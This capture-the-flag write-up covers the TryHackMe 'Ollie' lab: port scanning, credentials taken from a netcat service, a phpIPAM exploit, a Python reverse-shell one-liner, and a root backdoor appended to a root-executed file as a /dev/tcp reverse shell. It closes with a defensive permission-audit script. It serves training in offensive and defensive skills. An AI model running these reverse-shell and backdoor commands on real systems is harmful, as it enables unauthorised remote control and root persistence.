Ollie

Lab Setup

mkdir ~/Documents/TryHackMe/ollie
cd ~/Documents/TryHackMe/ollie
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}


export IP=10.10.156.24
export URL=http://$IP

Enumeration

To begin, scan all of the machine's ports with both rustscan and nmap. Running both gives a cross-check on the open ports and a more detailed view of the available services and potential vulnerabilities.

  • nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

  • rustscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

The scans show 3 open ports. I start by enumerating port 1337. Connect to it with the nc command and you will get the website credentials.

nc $IP 1337 

Use these credentials to log in, then enumerate the website. Obtaining a reverse shell is quite simple: the site runs phpIPAM, so search for it in exploit-db.

I found a Python script; with it you will add an evil.php file.

Exploitation

Use this to get a reverse shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.113.25",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After a lot of enumeration I discovered that all I need to do is switch user to ollie and use the password that I found from the port 1337 connection.

Privilege Escalation

After a while I found a file that user ollie can modify and that executes as root. Put a backdoor in it and you will get a shell as root.

ollie@hackerdog:/usr/bin$ echo 'bash -i >& /dev/tcp/10.8.113.25/8888 0>&1' >> /usr/bin/feedme

Open a netcat listener and wait for a while.

┌──(kali㉿kali)-[~/Documents/TryHackMe/ollie]
└─$ rlwrap nc -lnvp 8888                        
listening on [any] 8888 ...
connect to [10.8.113.25] from (UNKNOWN) [10.10.97.198] 37274
bash: cannot set terminal process group (4102): Inappropriate ioctl for device
bash: no job control in this shell
root@hackerdog:/# whoami 
whoami 
root
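
From the defender's side, the misconfiguration used above (a file that root executes but ollie can modify) can be caught with a permission audit. The script below is an added example, not part of the original write-up; it assumes root's scheduled programs are started from systemd units in /etc/systemd/system, and the function names and the TRUSTED_UID and UNIT_DIR variables are hypothetical.

```sh
#!/bin/sh
# Added example (not from the write-up): flag programs started from systemd
# units that an untrusted account could modify. Assumes GNU stat and sed.
TRUSTED_UID="${TRUSTED_UID:-0}"                 # only this uid may own them
UNIT_DIR="${UNIT_DIR:-/etc/systemd/system}"     # assumed unit location

# Print the program path of every ExecStart= line found in UNIT_DIR.
exec_paths() {
  cat "$UNIT_DIR"/*.service 2>/dev/null |
    sed -n 's|^ExecStart=[-@:+!]*\(/[^[:space:]]*\).*|\1|p' | sort -u
}

# Succeed (and print why) when an account other than TRUSTED_UID can write $1.
writable_by_untrusted() {
  path=$1
  info=$(stat -L -c '%u %g %a' -- "$path" 2>/dev/null) || {
    echo "$path: cannot stat, review manually"; return 0; }
  set -- $info                                  # $1=uid $2=gid $3=octal mode
  if [ "$1" != "$TRUSTED_UID" ]; then
    echo "$path: owned by uid $1, expected $TRUSTED_UID"; return 0
  fi
  if [ $(( 0$3 & 0002 )) -ne 0 ]; then
    echo "$path: world-writable (mode $3)"; return 0
  fi
  if [ $(( 0$3 & 0020 )) -ne 0 ] && [ "$2" != 0 ]; then
    echo "$path: writable by gid $2 (mode $3)"; return 0
  fi
  return 1
}

# Check every unit's program; return 1 if any finding was printed.
audit() {
  found=0
  for p in $(exec_paths); do
    if writable_by_untrusted "$p"; then found=1; fi
  done
  return "$found"
}

if [ "${1:-}" = "--run" ]; then audit; fi
```

Run it with `--run` as root on the host; a non-zero exit status means at least one root-executed program needs its ownership or mode tightened.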
